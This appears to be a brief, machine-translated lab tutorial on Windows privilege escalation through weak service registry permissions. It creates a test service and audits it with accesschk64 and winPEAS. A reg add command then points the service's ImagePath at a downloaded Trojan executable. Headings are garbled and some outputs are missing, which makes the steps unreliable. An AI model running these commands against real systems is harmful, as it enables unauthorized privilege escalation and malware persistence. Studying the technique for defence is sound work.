Some of the words
By hijacking the registry keys used by the service, an attacker can implement an application that executes maliciously
Actual use
Create the following service

Assign PTO rights to users

To modify registry permissions, proceed as follows
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\5attack

Grant full control over authenticating users

accesschk64
Current permissions are as follows

Verify that ALL access is assigned to the authenticated user
accesschk64.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services

Gets the target executable path

powershell

winPEASx64.exe

Using the details
Download the Trojan remotely and modify the service's executable directly through the registry
reg add "HKLM\system\currentcontrolset\services\5attack" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\y\13339.exe" /f

The permissions are as follows
